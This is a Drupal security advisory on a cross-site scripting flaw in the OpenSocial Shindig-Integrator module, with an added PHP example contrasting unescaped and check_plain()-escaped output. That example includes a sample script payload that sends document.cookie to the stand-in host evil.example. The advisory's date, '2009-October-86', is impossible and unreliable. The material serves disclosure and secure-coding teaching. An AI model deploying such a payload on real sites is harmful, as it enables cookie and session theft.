- Advisory ID: DRUPAL-SA-CONTRIB-2009-086
- Project: OpenSocial Shindig-Integrator (third-party module)
- Version: 6.x, 5.x
- Date: 2009-October-86
- Security risk: Moderately Critical
- Exploitable from: Remote
- Vulnerability: Cross Site Scripting
Description
The OpenSocial Shindig-Integrator module enables sites to host OpenSocial widgets.
The module does not sanitize user-supplied input before rendering it, making it vulnerable to cross site scripting (XSS) attacks. This vulnerability is mitigated by the fact that an attacker would need an account with the "create application" permission on the site.
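The following is an added illustration of the bug class this advisory describes, not code from the Shindig-Integrator module: a string that a user with the "create application" permission controls is written into HTML without escaping, beside the same rendering done with Drupal's check_plain(). The function names render_application_title_vulnerable() and render_application_title_fixed(), the $app array and the sample payload are constructed for the example; the check_plain() stand-in exists only so the file runs outside Drupal.

```php
<?php
// Added example, not the Shindig-Integrator module's own code. Demonstrates the
// class of bug in the advisory: an application title supplied by a user who has
// the "create application" permission is echoed into markup without escaping.
// The function names, the $app array and the payload are assumptions.

// Stand-in so this file runs outside Drupal. Drupal 6's check_plain() is
// htmlspecialchars() with ENT_QUOTES plus UTF-8 validation of the input.
if (!function_exists('check_plain')) {
  function check_plain($text) {
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
  }
}

// Vulnerable pattern: user-controlled string concatenated straight into HTML.
function render_application_title_vulnerable(array $app) {
  return '<h2 class="app-title">' . $app['title'] . '</h2>';
}

// Hardened pattern: escape every user-controlled string at output time.
function render_application_title_fixed(array $app) {
  return '<h2 class="app-title">' . check_plain($app['title']) . '</h2>';
}

// Constructed input: what an attacker holding "create application" could save.
$app = array(
  'title' => '<script>document.location="http://evil.example/?c="+document.cookie</script>',
);

$vulnerable = render_application_title_vulnerable($app);
$fixed      = render_application_title_fixed($app);

// The vulnerable output carries a live <script> element; the fixed one carries
// only the escaped text, which the browser displays rather than executes.
assert(strpos($vulnerable, '<script>') !== false);
assert(strpos($fixed, '<script>') === false);
assert(strpos($fixed, '&lt;script&gt;') !== false);

echo "vulnerable: $vulnerable\n";
echo "fixed:      $fixed\n";
```

The rule the fixed variant follows is the usual Drupal one: store what the user submitted, escape on output. Plain-text fields go through check_plain(); fields that legitimately hold a subset of HTML go through filter_xss() with an explicit allowed-tag list; URLs placed in href or src attributes go through check_url(), since escaping alone does not stop a javascript: URL.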
Versions affected
- OpenSocial Shindig-Integrator module for Drupal 6.x prior to OpenSocial Shindig-Integrator 6.x-2.1
- OpenSocial Shindig-Integrator module for Drupal 5.x
Drupal core is not affected. If you do not use the contributed OpenSocial Shindig-Integrator module, there is nothing you need to do.
Solution
Install the latest version or disable the module.
- If you use the OpenSocial Shindig-Integrator module for Drupal 6.x upgrade to OpenSocial Shindig-Integrator 6.x-2.1
- If you use the OpenSocial Shindig-Integrator module for Drupal 5.x, disable the module and uninstall it. The 5.x branch is no longer supported and will not receive a fix.
Reported by
- Tony Mobily
Fixed by
- Astha Bhatnagar, module maintainer.
Contact
The security team for Drupal can be reached at security at drupal.org or via the form at http://drupal.org/contact.